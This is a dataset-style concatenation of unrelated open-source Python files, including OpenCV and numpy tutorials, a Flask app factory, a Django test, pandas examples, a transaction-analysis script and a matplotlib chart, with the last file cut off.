Shows the image datatype.\n print(f'Image datatype: {img.dtype}')\n\ndef example_3():\n # An image is a matrix of values as we could see in previous examples:\n # Python list style.\n images = [\n # Loads the image from the given path with its default colors.\n cv.imread('cat.jpg'),\n # Loads the image from the given path with grayscale colors.\n cv.imread('cat.jpg', cv.IMREAD_GRAYSCALE)\n ]\n # Open a new window named 'Example 3'.\n cv.namedWindow('Example 3', cv.WINDOW_AUTOSIZE)\n # For-loop: loop through each element of images saving the value of\n # each iteration in img:\n for img in images:\n imshow_properties(img, 'Example 3')\n if cv.waitKey(0) == 27:\n break\n cv.destroyWindow('Example 3') # cv2.destroyAllWindows()\n\n# example_3()\n###############################################################################\n# 4. 
Images matrices creation\ndef example_4():\n # Ways of initialize a matrix\n # BE CAREFUL with the sizes.\n width = 480 # The width is the number of columns.\n height = 320 # The height is the number of rows.\n channels = 1 # 1 if grayscale, 3 if RGB or BGR.\n # GRAYSCALE IMAGES\n grayscale_images = [\n # Creates a 3rd-dim array and fills it with 0. When calling a function, you\n # can write the name of the parameter (dtype = 'uint8') or ignore it\n # ('uint8'). Sirve para llamar a la función unicamente con los parámetros \n # que te interesen, a lo mejor solo quieres usar dos parámetros de una\n # función de 5 parámetros y ambos parámetros estan en los extremos. Al igual\n # que en C++, Python va a procesar los parámetros uno por uno y en orden,\n # pero si le pones el nombre, le dará el valor al parámetro que has\n # declarado y no al siguiente que debería tocarle.\n np.zeros((height, width, channels), dtype = 'uint8'),\n # Creates a 3rd-dim array and fills it with a given value (255).\n np.full((height, width, channels), 255, dtype = 'uint8'),\n # Creates a 3rd-dim array and fills it with random values (between 0-256).\n np.random.randint(0, 256, (height, width, channels), dtype = 'uint8')\n ]\n\n # RGB/BGR IMAGES\n channels = 3\n rgb_images = [\n # Creates a 3rd-dim array and fills it with 0.\n np.zeros((height, width, channels), dtype = 'uint8'),\n # Creates a 3rd-dim array and fills it with a given value (255).\n np.full((height, width, channels), 255, dtype = 'uint8'),\n # Creates a 3rd-dim array and fills it with random values (between 0-256).\n np.random.randint(0, 256, (height, width, channels), dtype = 'uint8')\n ]\n # Open a new window named 'Example 3'.\n cv.namedWindow('Example 4', cv.WINDOW_AUTOSIZE)\n for img_gs in grayscale_images:\n imshow_properties(img_gs, 'Example 4')\n if cv.waitKey(0) == 27:\n break\n\n for img_rgb in rgb_images:\n imshow_properties(img_rgb, 'Example 4')\n if cv.waitKey(0) == 27:\n break\n cv.destroyWindow('Example 4') # cv2.destroyAllWindows()\n\n # You can also modify individual elements or regions of the image (matrix):\n # Init only one channel (0 -> R, 1 -> G, 2 -> B):\n # - [75,75,0]: each elements indicates the dimensions, ergo [row, column, channel].\n rgb_images[0][75,75,0] = 255\n # Init each channel:\n # - [75,75]: dimensions can be omited but you'll need to initialize the previous \n # dimension with a list with its size equally to the omited dimension.\n rgb_images[0][75,75] = [255,255,255]\n # Init a region only in one channel:\n rgb_images[0][0:75, 0:75, 0] = 255\n # Init a region in each channel:\n rgb_images[0][45:105, 45:105] = [255,255,255]\n return rgb_images\n\n# imgs = example_4()\n###############################################################################\n# 5. Image matrices operations\ndef example_5(imgs):\n # Creates a reference. If modified, will modify the original too.\n ref = imgs[2]\n # Creates a new whole variable.\n cpy = imgs[2].copy()\n # ADD, SUB, MUL\n cpy += 5 # Tambien vale con *=, /=. Aplica la operacion a toda la matriz.\n cpy = (imgs[0] - 1) * 3 - imgs[2] # Solo es un ejemplo.\n # Identity matrix\n idy = np.eye(3, dtype = 'float32')\n # One dimension array of 3 elements.\n x = np.ones((3,1), dtype = 'float32')\n # Element to element product. Se multiplica elemento por elemento [0]*[0], etc.\n y_0 = idy * x\n print(f'{y_0}')\n # Matrician product. 
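The slicing rules at the end of example_4 above compress into a few lines. A minimal sketch (sizes arbitrary) showing how single pixels, per-channel regions, and all-channel regions are assigned:

import numpy as np

img = np.zeros((4, 6, 3), dtype="uint8")  # height 4, width 6, 3 channels
img[1, 2, 0] = 255                        # one pixel, channel 0 only
img[1, 2] = [255, 255, 255]               # same pixel, all three channels at once
img[0:2, 0:3, 0] = 255                    # a 2x3 region in channel 0
img[2:4, 3:6] = [0, 255, 0]               # a region across every channel
print(img[:, :, 0])                       # inspect channel 0 as a 2-D matrix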
Producto matricial de toda la vida.\n y_1 = np.dot(idy,x)\n print(f'{y_1}')\n # Matrix transpose\n idy_t = idy.T\n # Matrix inverse\n idy_i = np.linalg.inv(idy)\n # Equation solution of A*X = Y\n cv.solve(idy, y_0, x)\n # Scalar and vector product\n v = np.random.randint(1, 10, (1, 3), dtype = 'uint8')\n w = np.random.randint(1, 10, (1, 3), dtype = 'uint8')\n s = np.dot(v,w.T) # Necesita invertirlo por el rollo de las dimensiones: (1,3) * (3,1) = (1,1)\n z = np.cross(v,w)\n # Boolean map. The operations will return a matrix with the result of the given\n # conditions for each element of the original matrices. Any condition can be\n # applied.\n cond = idy > np.random.randint(1, 10, (3, 3), dtype = 'uint8')\n\n#example_5(imgs)\n###############################################################################\n# 6. La practica. Escribir y probar un programa que tome imágenes con una cámara\n# y las muestre en pantalla. Si tu computador no lleva cámara integrada, \n# necesitarás una webcam (sirve una sencilla de 10 Euros).\n# Inicializar el medio para hacer la foto.\ncam = cv.VideoCapture(0)\n# Hacer la foto\nret, frame = cam.read()\nif ret:\n cv.namedWindow('Practica 0', cv.WINDOW_AUTOSIZE)\n imshow_properties(frame, 'Practica 0')\n cv.waitKey(0)\n cv.imwrite('captured.jpg', frame)\n cv.destroyWindow('Practica 0') # cv2.destroyAllWindows()\ncam.release()","repo_name":"dedetheprogrammer/vision22-23","sub_path":"vc_practica0/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"25799902535","text":"from pydantic import BaseModel\n\n\nclass CreateTrainingSessionRequest(BaseModel):\n training_id: int\n\n def to_query_string(self):\n params = self.dict()\n query = []\n for param, value in params.items():\n if value is None:\n continue\n query.append(f\"{param}={value}\")\n return \"&\".join(query)\n","repo_name":"fiufit/gateway","sub_path":"src/models/trainings/create_training_session.py","file_name":"create_training_session.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"31637466155","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User\n\nfrom datastore import models\n\nfrom datetime import datetime\n\n\nclass ConsumptionRecordTestCase(TestCase):\n\n def setUp(self):\n user = User.objects.create_user('john', 'lennon@thebeatles.com',\n 'johnpassword')\n project = models.Project.objects.create(\n project_owner=user.projectowner,\n project_id=\"PROJECTID_6\",\n )\n consumptionmetadata = models.ConsumptionMetadata.objects.create(\n project=project,\n interpretation=\"E_C_S\",\n unit=\"KWH\",\n )\n self.consumptionrecord = models.ConsumptionRecord.objects.create(\n metadata=consumptionmetadata,\n start=datetime(2011, 1, 1),\n value=0.0,\n estimated=True,\n )\n\n def test_attributes(self):\n attributes = [\n \"metadata\",\n \"start\",\n \"value\",\n \"estimated\",\n ]\n for attribute in attributes:\n assert hasattr(self.consumptionrecord, attribute)\n\n def test_eemeter_record(self):\n record = self.consumptionrecord.eemeter_record()\n assert isinstance(record, 
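The distinction example_5 draws between idy * x and np.dot is worth one standalone check. A minimal sketch (values arbitrary): * multiplies element by element with broadcasting, while np.dot — or the @ operator, equivalent for 2-D arrays — is the true matrix product:

import numpy as np

idy = np.eye(3, dtype="float32")
x = np.arange(1.0, 4.0).reshape(3, 1)   # column vector [1, 2, 3]

print(idy * x)         # element-wise with broadcasting: row i scaled by x[i]
print(np.dot(idy, x))  # matrix product: the identity returns x unchanged
print(idy @ x)         # same result as np.dot for 2-D arrays
print(np.allclose(np.linalg.inv(idy), idy.T))  # identity: inverse equals transpose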
dict)\n","repo_name":"impactlab/oeem-energy-datastore","sub_path":"datastore/tests/models/test_consumption_record.py","file_name":"test_consumption_record.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"43537421014","text":"import numpy as np\nimport pandas as pd\nfrom pandas import DataFrame, Series\n\n# pandas 最重要的一个功能是,它可以对不同索引的对象进行算术运算。在将对象相加时,如果存在不同的索引,则结果的索引就是该索引对的并集。\n\ns1 = Series([7.3, -2.5, 3.4, 1.5], index=[\"a\", \"c\", \"d\", \"e\"])\ns2 = Series([-2.1, 3.6, -1.5, 4, 3.1], index=[\"a\", \"c\", \"e\", \"f\", \"g\"])\nprint(s1 + s2)\n\nframe1 = DataFrame(np.arange(9).reshape((3, 3)), columns=list(\"bcd\"), index=[\"Ohio\", \"Texas\", \"Colorado\"])\nprint(frame1)\nframe2 = DataFrame(np.arange(12).reshape((4, 3)), columns=list(\"bde\"), index=[\"Utah\", \"Ohio\", \"Texas\", \"Oregen\"])\nprint(frame2)\nprint(frame1 + frame2)\n# 对齐会同时发生在行和列上\n# columns = list(\"qwertyu\")\n","repo_name":"songxinjianqwe/DataAnalysisWithPython","sub_path":"ch5/BasicFunction/bf5.py","file_name":"bf5.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"34487913948","text":"from flask import current_app, Flask, jsonify, request, g\nfrom flask_marshmallow import Marshmallow\nfrom flask_cors import CORS\nfrom flask_caching import Cache\nfrom datetime import datetime\nimport logging\nfrom .config import config_factory\nfrom .utils import metadata_log, init_DB, exponential_backoff, DBFailure\n\n\norigins = ['*']\n\ncors = CORS()\nmm = Marshmallow()\ncache = Cache()\n\n'''\nApplication factory for application package. \\\nDelays creation of an app by moving it into a factory function that can be \\\nexplicitly invoked from script and apply configuration changes.\n'''\n\ndef create_app(config):\n app = Flask(__name__)\n\n # disable WSGI logging\n logging.getLogger('werkzeug').disabled = True\n\n app.config.from_object(config_factory[config]) # load config from python module\n config_factory[config].init_app(app)\n\n # Exposes all resources matching /* to CORS and allows Content-Type header\n # For cookies, need implement CSRF as additional security measure\n cors.init_app(app, resources={r\"/*\": {\"origins\": origins}})\n mm.init_app(app)\n cache.init_app(app)\n\n # although docker-compose starts DB first, it does not wait for DB to be ready\n # exponential backoff for resilience\n with app.app_context():\n exponential_backoff(Exception)(init_DB)()\n \n \n from portcast_app.api.v1 import api_v1 as api_blueprint\n app.register_blueprint(api_blueprint, url_prefix='/api/v1')\n\n register_global_errors(app)\n register_global_hooks(app)\n\n return app\n\n\ndef register_global_hooks(app):\n\n # @app.before_first_request\n # def initialize():\n # init_DB()\n\n @app.before_request\n def set_global_variables():\n g.request_timestamp_start = datetime.utcnow()\n g.context = request.json if request.method == 'POST' else None\n\n\n @app.after_request\n def log_request(resp):\n if resp.status_code < 400:\n current_app.logger.info(\n 'after request logging',\n extra=metadata_log(resp.status_code, g)\n )\n return resp\n \n @app.teardown_appcontext\n def close_DB(f):\n if hasattr(g, 'mysql_db'):\n g.mysql_db.close()\n\n if hasattr(g, 'requests'):\n g.requests.close()\n\n return f\n\n\n\ndef register_global_errors(app):\n \n @app.errorhandler(400)\n def bad_request(e):\n current_app.logger.error(e)\n return jsonify({\n 
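The index-alignment behavior the pandas record above demonstrates has one standard companion trick. A minimal sketch: adding objects with different indexes yields NaN on the index union, and Series.add with fill_value treats the missing side as zero instead:

import pandas as pd

s1 = pd.Series([1.0, 2.0], index=["a", "b"])
s2 = pd.Series([10.0, 20.0], index=["b", "c"])

print(s1 + s2)                   # a and c become NaN: only "b" overlaps
print(s1.add(s2, fill_value=0))  # a=1.0, b=12.0, c=20.0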
'error': 'bad request',\n 'message': e.description,\n }), 400\n\n\n @app.errorhandler(404)\n def endpoint_not_found(e):\n current_app.logger.error(e)\n return jsonify({\n 'error': 'resource not found',\n 'message': e.description\n }), 404\n\n\n @app.errorhandler(500)\n def server_error(e):\n current_app.logger.error(e)\n return jsonify({\n 'error': 'server error',\n 'message': e.description\n }), 500","repo_name":"daronphang/portcast_assignment","sub_path":"portcast_app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"2303131877","text":"from math import log, e, exp\r\n\r\nf = lambda x: x - (e**x - 4*x**2 )/(e**x - 8*x)\r\ntol = 0.01\r\nx0 = float(input('Input initial value!= 0: '))\r\n\r\nfor i in range(1,30):\r\n xn = f(x0)\r\n if abs(xn-x0)= conf.START_DATE) & (rtn_df[\"plat_date\"] <= conf.END_DATE)]\n\n return rtn_df\n\n\ndef get_point_csv(parm_df):\n pnt_df = pd.DataFrame({})\n logger.info(\"****MAKING POINT CSV FILE BEGIN****\")\n label_list = [\"mer_id\", \"mobile_no\"]\n logger.info(\"[1]. POINT LABEL LIST:\")\n logger.info(label_list)\n\n logger.info(\"[2]. GET POINT LABEL CSV:\")\n for label in label_list:\n single_pnt_df = pd.DataFrame({})\n pnt_list = pd.Series(parm_df[label].unique()).tolist()\n logger.info(\"==>> LABEL: %s, COUNT: %s\" % (label, len(pnt_list)))\n single_pnt_df[\"label\"] = pd.Series(parm_df[label].unique())\n single_pnt_df[\"class\"] = label\n pnt_df = pnt_df.append(single_pnt_df)\n del single_pnt_df\n\n logger.info(\"[3]. POINT[SHAPE]:\")\n logger.info(pnt_df.shape)\n\n logger.info(\"[4]. SAVE POINT CSV FILE:\")\n pnt_path = conf.RESULT_PATH + \"pnt\" + \".csv\"\n pnt_df.to_csv(pnt_path, index=False)\n logger.info(\"SAVE TO: %s\" % pnt_path)\n logger.info(\"****MAKING POINT CSV FILE END****\")\n del pnt_df\n del parm_df\n\n\ndef get_relation_csv(parm_df):\n\n\n\n rlat_df = pd.DataFrame({})\n pnt_df = pd.DataFrame({})\n logger.info(\"****MAKING RELATION CSV FILE BEGIN****\")\n label_list = [\"mobile_no\"]\n logger.info(\"[1]. RELATION LABEL LIST:\")\n logger.info(label_list)\n\n # logger.info(parm_df[parm_df[\"mobile_no\"] == \"13013330277\"])\n\n logger.info(\"[2]. 
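The Newton-iteration record above is cut off mid-line in this dump (its loop body runs into the next record), so here is a hedged, self-contained reconstruction of the scheme it sets up: a root of e^x - 4x^2 = 0 via updates x - f(x)/f'(x), with f'(x) = e^x - 8x. The tolerance 0.01 and the 30-iteration cap come from the source; the starting value and the print are assumptions (the original prompts the user for x0):

from math import exp

step = lambda x: x - (exp(x) - 4 * x**2) / (exp(x) - 8 * x)  # one Newton update
tol = 0.01
x0 = 1.0  # assumed; the source reads this from input()
for i in range(1, 30):
    xn = step(x0)
    if abs(xn - x0) < tol:
        print(f"root ~ {xn:.4f} after {i} iterations")  # converges near 0.715
        break
    x0 = xn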
GET RELATION LABEL CSV:\")\n for label in label_list:\n single_pnt_df = pd.DataFrame({})\n logger.info(\"==>> LABEL: %s\" % label)\n parm_dup = parm_df.drop_duplicates([\"mer_id\", label])\n single_rlat_df = pd.pivot_table(parm_dup, index=[label], values=[\"mer_id\"],aggfunc=len).reset_index()\n\n logger.info(single_rlat_df.shape)\n logger.info(single_rlat_df)\n\n logger.info(len(single_rlat_df[\"mer_id\"].unique().tolist()))\n\n pnd_lbl_list = pd.Series(single_rlat_df[single_rlat_df[\"mer_id\"] > 1][label]).tolist()\n logger.info(\"==>> PENDING LABEL LENGTH: %s\" % len(pnd_lbl_list))\n sys.exit(0)\n pnd_lbl_df = pd.DataFrame(parm_df[parm_df[label].isin(pnd_lbl_list)])\n pnd_rlat = pd.pivot_table(pnd_lbl_df, index=[label,\"mer_id\"], values=[\"inst_id\"], aggfunc=len).reset_index()\n\n pnd_rlat.rename(columns={label: \"source\", \"mer_id\": \"target\", \"inst_id\": \"weight\"}, inplace=True)\n pnd_rlat[\"type\"] = \"Undirected\"\n pnd_rlat[\"label\"] = \"mer_with_\" + label\n rlat_df = rlat_df.append(pnd_rlat)\n\n pnt_list = pd.Series(pnd_lbl_df[label].unique()).tolist()\n logger.info(\"==>> LABEL: %s, COUNT: %s\" % (label, len(pnt_list)))\n single_pnt_df[\"label\"] = pd.Series(pnd_lbl_df[label].unique())\n single_pnt_df[\"class\"] = label\n pnt_df = pnt_df.append(single_pnt_df)\n\n del single_rlat_df\n\n logger.info(\"[3]. SINGLE RELATION[SHAPE]:\")\n print(pnt_df)\n logger.info(pnt_df.shape)\n\n logger.info(\"[3]. ALL RELATION[SHAPE]:\")\n print(rlat_df)\n logger.info(rlat_df.shape)\n\n logger.info(\"[4]. SAVE RELATION CSV FILE:\")\n rlat_path = conf.RESULT_PATH + \"rlat\" + \".csv\"\n rlat_df.to_csv(rlat_path, index=False)\n logger.info(\"SAVE TO: %s\" % rlat_path)\n logger.info(\"****MAKING RELATION CSV FILE END****\")\n del rlat_df\n del parm_df\n\n\ndef overall_rpt(parm_rst):\n global CAP_TRX_CNT, TOT_TRX_AMT\n # date_range = 31\n logger.info(\"****OVERALL REPORT START****\")\n logger.info(parm_rst.head(1)[\"plat_date\"])\n logger.info(parm_rst.tail(1)[\"plat_date\"])\n logger.info(\"[1]. TOTAL DATA SHAPE:\")\n logger.info(parm_rst.shape)\n logger.info(\"[2]. STATISTICS RANGE: FROM %s TO %s\" % (conf.START_DATE, conf.END_DATE))\n total_trx_amount = round(TOT_TRX_AMT / 1000000000, 2)\n logger.info(\"[3]. TOTAL TRANSACTION COUNT: %s\" % CAP_TRX_CNT)\n logger.info(\"[4]. TOTAL TRANSACTION AMOUNT: %s BILLION\" % total_trx_amount)\n mer_id_cnt = np.array(parm_rst[\"mer_id\"].unique())\n prod_id_cnt = pd.DataFrame(np.array(parm_rst[\"prod_id\"].unique()).tolist()).dropna(axis=0, how='any').size\n device_id_cnt = pd.DataFrame(np.array(parm_rst[\"td_device\"].unique()).tolist()).dropna(axis=0, how='any').size\n device_id_cnt_daily = round(device_id_cnt / conf.DATE_RANGE, 2)\n logger.info(\"[5]. TOTAL MERCHANT COUNT: %s\" % mer_id_cnt.size)\n mer_id_details_path = conf.RESULT_PATH + \"mer_id_details\" + \".csv\"\n # pd.DataFrame(rst[\"mer_id\"].value_counts()).reset_index().head(10).to_csv(mer_id_details_path, index=False)\n logger.info(\"TOP10 MERCHANT COUNT DETAILS SAVE TO %s\" % mer_id_details_path)\n logger.info(\"[6]. TOTAL PRODUCT COUNT: %s\" % prod_id_cnt)\n prod_id_details_path = conf.RESULT_PATH + \"prod_id_details\" + \".csv\"\n # pd.DataFrame(rst[\"prod_id\"].value_counts()).reset_index().to_csv(prod_id_details_path, index=False)\n logger.info(\"PRODUCT COUNT DETAILS SAVE TO: %s\" % prod_id_details_path)\n logger.info(\"[7]. TOTAL DEVICE CAPTURE COUNT: %s\" % device_id_cnt)\n logger.info(\"[8]. 
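The pivot_table call in get_relation_csv above — count distinct merchants per phone number, then keep only the phones tied to more than one — reduces to a small pattern. A minimal sketch with made-up values:

import pandas as pd

df = pd.DataFrame({
    "mobile_no": ["111", "111", "222", "222"],
    "mer_id":    ["m1",  "m2",  "m1",  "m1"],
})
dedup = df.drop_duplicates(["mer_id", "mobile_no"])
counts = pd.pivot_table(dedup, index=["mobile_no"], values=["mer_id"],
                        aggfunc=len).reset_index()
print(counts)                        # 111 -> 2 merchants, 222 -> 1
print(counts[counts["mer_id"] > 1])  # only 111 survives the > 1 filter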
DAILY DEVICE CAPTURE COUNT: %s\" % device_id_cnt_daily)\n td_device_details_path = conf.RESULT_PATH + \"td_device_details\" + \".csv\"\n # pd.DataFrame(rst[\"td_device\"].value_counts()).reset_index().head(10).to_csv(td_device_details_path, index=False)\n logger.info(\"TOP10 DEVICE COUNT DETAILS SAVE TO %s\" % td_device_details_path)\n logger.info(\"****OVERALL REPORT END****\")\n\n\ndef data_preproc(parm_csv_folder, parm_csv_file_list):\n global CAP_TRX_CNT, TOT_TRX_AMT\n CAP_TRX_CNT = 0.\n TOT_TRX_AMT = 0.\n rst = pd.DataFrame({})\n\n # gc.set_debug(gc.DEBUG_STATS | gc.DEBUG_LEAK)\n gc.collect()\n gc.disable()\n for csv_file in parm_csv_file_list:\n # 1. 获取CSV文件路径\n csv_file_path = os.path.join('%s%s%s' % (parm_csv_folder, '/', csv_file))\n logger.info(\"csv_file_path = %s\" % csv_file_path)\n csv_file_path = \"D:/github_program/myPython/docs/csvfiles/201801/td_device_201801\"\n # csv_file_path = \"D:/github_program/myPython/docs/csvfiles/todo_td/NO 1_td_1\"\n\n # 2. 读取CSV文件\n reader = pd.read_csv(csv_file_path, encoding='utf-8', chunksize=5000, iterator=True, sep=\"|\", dtype=str)\n\n # 3. 数据处理\n df_trx_detail = get_trx_detail(reader)\n logger.info(\"SINGLE CHUNK SHAPE:\")\n logger.info(df_trx_detail.shape)\n CAP_TRX_CNT = CAP_TRX_CNT + df_trx_detail.shape[0]\n TOT_TRX_AMT = TOT_TRX_AMT + df_trx_detail[\"trx_amount\"].sum()\n rst = rst.append(df_trx_detail, ignore_index=True)\n reader.close()\n del reader\n del df_trx_detail\n gc.enable() # re-enable garbage collection\n gc.collect()\n\n return rst\n\n\ndef get_csv_folder():\n # father_path = os.path.abspath(os.path.dirname(os.getcwd()) + os.path.sep + \".\")\n # default_dir = os.path.abspath(os.path.dirname(father_path) + os.path.sep + \"..\") + '\\\\docs\\\\csvfiles'\n csv_folder = \"D:/github_program/myPython/docs/csvfiles/todo_td/\"\n # csv_folder = tf.askdirectory(title=u\"选择文件CSV文件夹\", initialdir=conf.CSV_PATH)\n if len(csv_folder) == 0:\n tm.showinfo(title='提示', message='请选取的CSV文件夹')\n sys.exit(0)\n\n return csv_folder\n\n\ndef create_rpt(parm_rst):\n if len(parm_rst) != 0:\n logger.info(\"--------------------------------------------\")\n # 1. OVERALL REPORT\n # overall_rpt(parm_rst)\n logger.info(\"--------------------------------------------\")\n parm_rst = parm_rst[parm_rst[\"mobile_no\"] != \"00000000000\"]\n # 2. get_point_csv\n # get_point_csv(parm_rst)\n logger.info(\"--------------------------------------------\")\n # 3. get_relation_csv\n # len(parm_rst[\"mer_id\"].unique().tolist())\n logger.info(len(parm_rst[\"mer_id\"].unique().tolist()))\n\n\n\n get_relation_csv(parm_rst)\n else:\n logger.info(\"parm_rst IS NULL, WRONG...\")\n del parm_rst\n\n\ndef main_process(parm_csv_folder):\n \"\"\"\n Data Preparation From CSV File & Insert into DB\n\n Parameters:\n parm_csv_folder: CSV file path\n\n Returns:\n None\n\n Raises:\n IOError: An error occurred accessing the bigtable.Table object.\n \"\"\"\n csv_file_list = os.listdir(parm_csv_folder)\n logger.info(\"PENDING CSV FILES LIST: %s\" % csv_file_list)\n rst = data_preproc(csv_folder, csv_file_list)\n create_rpt(rst)\n logger.info(\"--------------------------------------------\")\n logger.info('Main Processing Have Done...')\n\n\ndef init():\n logger.info(\"\\n####LOG START####\")\n logger.info(\"\\n--------------------------------------------\")\n logger.info(\"[1]. SYSTEM CONSTANT:\")\n logger.info(\"LOG PATH: %s\" % conf.LOG_PATH)\n logger.info(\"RESULT PATH: %s\" % conf.RESULT_PATH)\n logger.info(\"[2]. 
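data_preproc above streams each CSV with pd.read_csv(..., chunksize=5000) and accumulates per-chunk totals; two details are worth noting. Passing iterator=True alongside chunksize is redundant (chunksize alone already returns a TextFileReader), and appending to a growing DataFrame inside the loop is quadratic — collecting chunks in a list and concatenating once is the idiomatic form. A minimal sketch with an in-memory file standing in for a path:

import io
import pandas as pd

csv_text = "amt|id\n1.5|a\n2.5|b\n4.0|c\n"
chunks = []
total = 0.0
for chunk in pd.read_csv(io.StringIO(csv_text), sep="|", chunksize=2):
    total += chunk["amt"].sum()
    chunks.append(chunk)
df = pd.concat(chunks, ignore_index=True)  # one concat instead of repeated appends
print(len(df), total)                      # 3 8.0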
BUSINESS CONSTANT:\")\n logger.info(\"START DATE: %s\" % conf.START_DATE)\n logger.info(\"END DATE: %s\" % conf.END_DATE)\n logger.info(\"DATE RANGE: %s\" % conf.DATE_RANGE)\n logger.info(\"ID HURDLE: %s\" % conf.ID_HURDLE)\n logger.info(\"TRX HURDLE: %s\" % conf.TRX_HURDLE)\n logger.info(\"--------------------------------------------\")\n\n\nif __name__ == '__main__':\n start_time = datetime.datetime.now()\n conf = config.DeviceConfig()\n logger = Logger(path=conf.LOG_PATH)\n init()\n csv_folder = get_csv_folder()\n logger.info('CSV FILES FOLDER: %s' % csv_folder)\n main_process(csv_folder)\n end_time = datetime.datetime.now()\n logger.info(\"--------------------------------------------\")\n logger.info(\"Total Processing Time:\")\n logger.info('START TIME = %s' % start_time)\n logger.info('END TIME = %s' % end_time)\n logger.info('DIFF TIME = %s' % (end_time - start_time))\n logger.info('System Processing Have Done...')\n","repo_name":"GaaraKai/myPython","sub_path":"riskproject/test/core/gephi_stat.py","file_name":"gephi_stat.py","file_ext":"py","file_size_in_byte":12147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"15917243456","text":"# Import libraries\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\n# Creating dataset\nsize = 6\ncars = ['AUDI', 'BMW', 'FORD',\n\t\t'TESLA', 'JAGUAR', 'MERCEDES']\n\ndata = np.array([[23, 16], [17, 23],\n\t\t\t\t[35, 11], [29, 33],\n\t\t\t\t[12, 27], [41, 42]])\n\n# normalizing data to 2 pi\nnorm = data / np.sum(data)*2 * np.pi\n\n# obtaining ordinates of bar edges\nleft = np.cumsum(np.append(0,\n\t\t\t\t\t\tnorm.flatten()[:-1])).reshape(data.shape)\n\n# Creating color scale\ncmap = plt.get_cmap(\"tab20c\")\nouter_colors = cmap(np.arange(6)*4)\ninner_colors = cmap(np.array([1, 2, 5, 6, 9,\n\t\t\t\t\t\t\t10, 12, 13, 15,\n\t\t\t\t\t\t\t17, 18, 20 ]))\n\n# Creating plot\nfig, ax = plt.subplots(figsize =(10, 7),\n\t\t\t\t\tsubplot_kw = dict(polar = True))\n\nax.bar(x = left[:, 0],\n\twidth = norm.sum(axis = 1),\n\tbottom = 1-size,\n\theight = size,\n\tcolor = outer_colors,\n\tedgecolor ='w',\n\tlinewidth = 1,\n\talign =\"edge\")\n\nax.bar(x = left.flatten(),\n\twidth = norm.flatten(),\n\tbottom = 1-2 * size,\n\theight = size,\n\tcolor = inner_colors,\n\tedgecolor ='w',\n\tlinewidth = 1,\n\talign =\"edge\")\n\nax.set(title =\"Nested pie chart\")\nax.set_axis_off()\n\n# show plot\nplt.show()\n","repo_name":"Kulbhushankarn/Plot-pie-chart-using-Matplotlib","sub_path":"code2.py","file_name":"code2.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"31838573236","text":"import copy\n\ndef safeUpdate(d1, d2, *str):\n # Creates a copy of the dictionary d1 and overwrites the matching key values available in d2.\n # d2 is also copied. Both d1 and d2 stays intact\n # if str is a list of strings, d2 is interpreted to be a nested dictionary.\n # In that case, it is searched iteratively for the strings to get the right dictionary to be matched to d1\n d1Copy = d1.copy( )\n d2Copy = d2.copy( )\n for s in str:\n if s in d2Copy:\n if isinstance(d2Copy[s], dict):\n d2Copy = d2Copy[s].copy()\n else:\n d2Copy = {}\n else:\n d2Copy = {}\n\n common_keys = set(d1Copy.keys( )) & set(d2Copy.keys( ))\n d1Copy.update({k: d2Copy[k] for k in common_keys})\n return d1Copy\n\n\ndef safeRemove(d, *str):\n # removes the keys in str from a copy of dictionary d and returns it. 
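safeUpdate above has a slightly subtle contract — walk the override dict down a key path, then overwrite only the keys the base dict already has, leaving both inputs intact. A condensed re-expression for illustration (the snake_case name and sample values are mine, not from the source):

def safe_update(d1, d2, *path):
    sub = d2
    for key in path:
        sub = sub.get(key, {}) if isinstance(sub, dict) else {}
    out = dict(d1)
    out.update({k: sub[k] for k in d1.keys() & sub.keys()})  # only shared keys move over
    return out

defaults = {"lr": 0.1, "epochs": 10}
overrides = {"model": {"lr": 0.01, "unused": 5}}
print(safe_update(defaults, overrides, "model"))  # {'lr': 0.01, 'epochs': 10}
print(defaults)                                   # original left untouched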
d remains intact\n dCopy = copy.deepcopy(d)\n [dCopy.pop(s, None) for s in str]\n return dCopy\n\n\n\n","repo_name":"shajain/GaussianMixtureEmbedding","sub_path":"misc/dictUtils.py","file_name":"dictUtils.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"34861237529","text":"import sys\nsys.path.append('..')\nfrom src import ML\nfrom src import config\nfrom src.Standard import SpectralAverage\nimport os\nfrom tqdm import tqdm\nimport argParser\nfrom datetime import datetime\nimport numpy as np\n\n\ndef main():\n\n args = argParser.main([\n 'studies_folder',\n 'study_names',\n 'task',\n 'data_type',\n 'log_dirs',\n 'checkpoint_dirs',\n 'length',\n 'channels',\n 'artifact',\n 'erp_degree',\n 'filter_band',\n 'normalize',\n 'plot_spectra',\n 'plot_hist',\n 'plot_conf',\n 'plot_3d_preds',\n # 'pred_level',\n 'fallback',\n 'combine',\n 'limited_subjects'\n ])\n\n data_type = args.data_type\n studies_folder = args.studies_folder\n study_names = args.study_names\n log_dirs = args.log_dirs\n checkpoint_dirs = args.checkpoint_dirs\n combine = args.combine\n limited_subjects = args.limited_subjects\n fallback = args.fallback\n # pred_level = args.pred_level\n task = args.task\n length = args.length\n channels = args.channels\n artifact = args.artifact\n erp_degree = args.erp_degree\n filter_band = args.filter_band\n normalize = args.normalize\n plot_spectra = args.plot_spectra\n plot_hist = args.plot_hist\n plot_conf = args.plot_conf\n plot_3d_preds = args.plot_3d_preds\n\n # patient_path points to our 'condition-positive' dataset\n # ex. patient_path =\n # \"/wavi/EEGstudies/CANlab/spectra/P300_250_1111111111111111111_0_1\"\n if checkpoint_dirs is None:\n checkpoint_dirs = [\n 